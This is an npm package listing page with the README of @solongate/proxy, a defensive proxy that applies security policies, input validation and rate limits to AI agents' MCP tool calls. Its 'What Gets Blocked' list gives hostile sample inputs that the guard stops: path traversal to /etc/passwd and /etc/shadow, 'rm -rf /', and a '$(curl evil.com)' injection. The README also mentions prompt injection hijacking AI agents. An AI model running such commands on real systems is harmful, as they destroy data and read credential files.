npm package discovery and stats viewer.

Discover Tips

  • General search

    [free text search, go nuts!]

  • Package details

    pkg:[package-name]

  • User packages

    @[username]

Sponsor

Optimize Toolset

I’ve always been into building performant and accessible sites, but lately I’ve been taking it extremely seriously. So much so that I’ve been building a tool to help me optimize and monitor the sites that I build to make sure that I’m making an attempt to offer the best experience to those who visit them. If you’re into performant, accessible and SEO friendly sites, you might like it too! You can check it out at Optimize Toolset.

About

Hi, 👋, I’m Ryan Hefner  and I built this site for me, and you! The goal of this site was to provide an easy way for me to check the stats on my npm packages, both for prioritizing issues and updates, and to give me a little kick in the pants to keep up on stuff.

As I was building it, I realized that I was actually using the tool to build the tool, and figured I might as well put this out there and hopefully others will find it to be a fast and useful way to search and browse npm packages as I have.

If you’re interested in other things I’m working on, follow me on Twitter or check out the open source projects I’ve been publishing on GitHub.

I am also working on a Twitter bot for this site to tweet the most popular, newest, random packages from npm. Please follow that account now and it will start sending out packages soon–ish.

Open Software & Tools

This site wouldn’t be possible without the immense generosity and tireless efforts from the people who make contributions to the world and share their work via open source initiatives. Thank you 🙏

© 2026 – Pkg Stats / Ryan Hefner

@solongate/proxy

v0.8.2

Published

MCP security proxy — protect any MCP server with customizable policies, path/command constraints, rate limiting, and audit logging. Zero code changes required.

Vulnerabilities

Powered byPowered by Snyk
  • 0High
  • 0Medium
  • 0Low

Links

Git

Maintainers

codeyevskycodeyevsky

Keywords

mcpmodel-context-protocolsecurityproxygatewayfirewallai-securitytool-securityclaudeopenclawsolongateprompt-injectionpath-traversalrate-limiting

Readme

@solongate/proxy

MCP Security Proxy — Protect any MCP server with security policies, input validation, rate limiting, and audit logging. Zero code changes required.

MCP Client ──(stdio)──> SolonGate Proxy ──(stdio)──> MCP Server
                             │
                        [rate limit]
                        [input guard]
                        [policy eval]
                        [audit log]

Works with every MCP client: Claude Code, Claude Desktop, Cursor, Windsurf, Cline, Zed, and any application that supports the Model Context Protocol over stdio.

Quick Start

Automatic Setup

Run this in your project directory (where your .mcp.json lives):

npx @solongate/proxy init --all

Restart your MCP client. Done.

Manual Setup

Edit your .mcp.json:

{
  "mcpServers": {
    "my-server": {
      "command": "npx",
      "args": [
        "@solongate/proxy",
        "--policy", "restricted",
        "--",
        "node", "./my-server/dist/index.js"
      ]
    }
  }
}

Policy Presets

| Preset | Description | |--------|-------------| | restricted | Blocks shell/exec/eval, allows reads and writes (recommended) | | read-only | Only allows read/list/get/search/query operations | | permissive | Allows all tools, still enforces input validation | | deny-all | Blocks all tool calls (emergency lockdown) |

What Gets Blocked

Input Guard (always active):

  • Path traversal: ../../etc/passwd
  • Shell injection: ; rm -rf /, `whoami`, $(curl evil.com)
  • Pipe injection: | cat /etc/shadow
  • Oversized inputs (DoS prevention)

Policy Engine (configurable):

  • Shell execution tools (shell_exec, run_command, etc.)
  • Eval/exec tools
  • Web fetch (data exfiltration prevention)
  • Any tool matching your custom patterns

Custom Policies

Create a JSON policy file:

{
  "id": "my-policy",
  "name": "My Custom Policy",
  "version": 1,
  "rules": [
    {
      "id": "deny-exec",
      "effect": "DENY",
      "priority": 100,
      "toolPattern": "*exec*",
      "permission": "EXECUTE",
      "minimumTrustLevel": "UNTRUSTED",
      "enabled": true
    },
    {
      "id": "allow-rest",
      "effect": "ALLOW",
      "priority": 1000,
      "toolPattern": "*",
      "permission": "EXECUTE",
      "minimumTrustLevel": "UNTRUSTED",
      "enabled": true
    }
  ]
}
npx @solongate/proxy --policy ./my-policy.json -- node my-server.js

CLI Options

solongate-proxy [options] -- <server-command> [args...]

Options:
  --policy <preset|file>   Policy preset or JSON file (default: restricted)
  --name <name>            Proxy display name
  --verbose                Show detailed error messages
  --no-input-guard         Disable input validation
  --rate-limit <n>         Per-tool rate limit (calls/min)
  --global-rate-limit <n>  Global rate limit (calls/min)
  --config <file>          Load full config from JSON file
  --api-key <key>          SolonGate Cloud API key (cloud policy + audit)
  --api-url <url>          Custom API URL (default: api.solongate.com)

Restore Original Config

npx @solongate/proxy init --restore

Why SolonGate?

MCP servers give AI agents direct access to your system — shell commands, file system, databases, network. A single prompt injection attack can turn your AI assistant into an attacker.

SolonGate sits between the AI client and the MCP server, enforcing security policies on every tool call before it reaches the server.

Learn more at solongate.com

License

MIT